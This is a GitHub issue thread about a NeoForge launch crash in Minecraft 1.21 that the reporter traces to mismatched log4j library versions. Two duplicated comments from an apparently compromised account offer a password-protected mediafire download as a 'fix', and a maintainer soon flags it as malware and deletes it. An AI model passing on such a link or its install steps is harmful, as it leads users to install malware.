### ISSUE TITLE
[1.21 & 1.21.1] About the java crash with Neoforge on pack start

### ISSUE THREAD

**Issue by liuxuefeng1997** [neoforged/NeoForge#1507] opened 2024-09-01 21:09 UTC
**Minecraft Version:** 1.21 & 1.21.1

**NeoForge Version:** 21.0.167 & 21.1.34

**Logs:** 

> `Exception in thread "main" java.lang.module.ResolutionException: Modules org.apache.logging.log4j.slf4j and org.apache.logging.log4j.slf4j2.impl export package org.apache.logging.slf4j to module io.netty.codec
>     at java.base/java.lang.module.Resolver.resolveFail(Resolver.java:900)
>     at java.base/java.lang.module.Resolver.failTwoSuppliers(Resolver.java:814)
>     at java.base/java.lang.module.Resolver.checkExportSuppliers(Resolver.java:735)
>     at java.base/java.lang.module.Resolver.finish(Resolver.java:380)
>     at java.base/java.lang.module.Configuration.<init>(Configuration.java:139)
>     at java.base/java.lang.module.Configuration.resolveAndBind(Configuration.java:493)
>     at java.base/java.lang.module.Configuration.resolveAndBind(Configuration.java:297)
>     at cpw.mods.bootstraplauncher@2.0.2/cpw.mods.bootstraplauncher.BootstrapLauncher.run(BootstrapLauncher.java:196)
>     at cpw.mods.bootstraplauncher@2.0.2/cpw.mods.bootstraplauncher.BootstrapLauncher.main(BootstrapLauncher.java:69)`

**Steps to Reproduce:**
 

1. Build with official installer and run

**Description of issue:**
I found a problem with the JSON file created by the official installer
The “log4j-slf4j2-impl” reference is version 2.19.0

> `{"name":"org.apache.logging.log4j:log4j-slf4j2-impl:2.19.0@jar","downloads":{"artifact":{"sha1":"5c04bfdd63ce9dceb2e284b81e96b6a70010ee10","size":27721,"url":"https://libraries.minecraft.net/org/apache/logging/log4j/log4j-slf4j2-impl/2.19.0/log4j-slf4j2-impl-2.19.0.jar","path":"org/apache/logging/log4j/log4j-slf4j2-impl/2.19.0/log4j-slf4j2-impl-2.19.0.jar"}}},`

But “log4j-core” and "log4j-api" is version 2.22.1

> `{"name":"org.apache.logging.log4j:log4j-core:2.22.1@jar","downloads":{"artifact":{"sha1":"7183a25510a02ad00cc6a95d3b3d2a7d3c5a8dc4","size":1900022,"url":"https://libraries.minecraft.net/org/apache/logging/log4j/log4j-core/2.22.1/log4j-core-2.22.1.jar","path":"org/apache/logging/log4j/log4j-core/2.22.1/log4j-core-2.22.1.jar"}}},`

> `{"name":"org.apache.logging.log4j:log4j-api:2.22.1@jar","downloads":{"artifact":{"sha1":"bea6fede6328fabafd7e68363161a7ea6605abd1","size":335001,"url":"https://libraries.minecraft.net/org/apache/logging/log4j/log4j-api/2.22.1/log4j-api-2.22.1.jar","path":"org/apache/logging/log4j/log4j-api/2.22.1/log4j-api-2.22.1.jar"}}},`

When I change the version of ”log4j-slf4j2-impl“ to Match “log4j-core” and “log4j-api”, the game will start normally

**Comment by goncastrum** [comment] 2024-09-01 21:27
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment] 2024-09-01 21:27
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by TelepathicGrunt** [comment] 2024-09-01 21:30
Do NOT download the malware from the compromised random account that was commenting here. I just deleted them.
Never trust any online post asking people to download and run suspicious links

**Comment by KRUTIKOVARTEM2009** [comment] 2024-09-03 15:58
I did the same but it still crashed
I was trying to test The Ultimate Car/Plane mods that use NeoForge

**Comment by sciwhiz12** [comment] 2024-09-03 18:47
I can't reproduce the crash using the provided steps with 21.1.34 as reported or 21.1.37, the latest version as of writing.

It is a known issue at the moment that there are certain version mismatches in the libraries. However, that should be irrelevant to actually launching the game.

Additionally, we use the issue tracker exclusively for final bug reports and feature requests. This issue appears to be better suited for the [NeoForge Discord](https://discord.neoforged.net/). Please ask in the `#user-support` channel (under the "For Users" category) in the Discord server, and the conversation can continue there.

Closing as non-reproducible and not a final bug report.

**Closed as not planned by sciwhiz12** 2024-09-03 18:47 UTC
Labels: bug, triage, regression, 1.21, 1.21.1
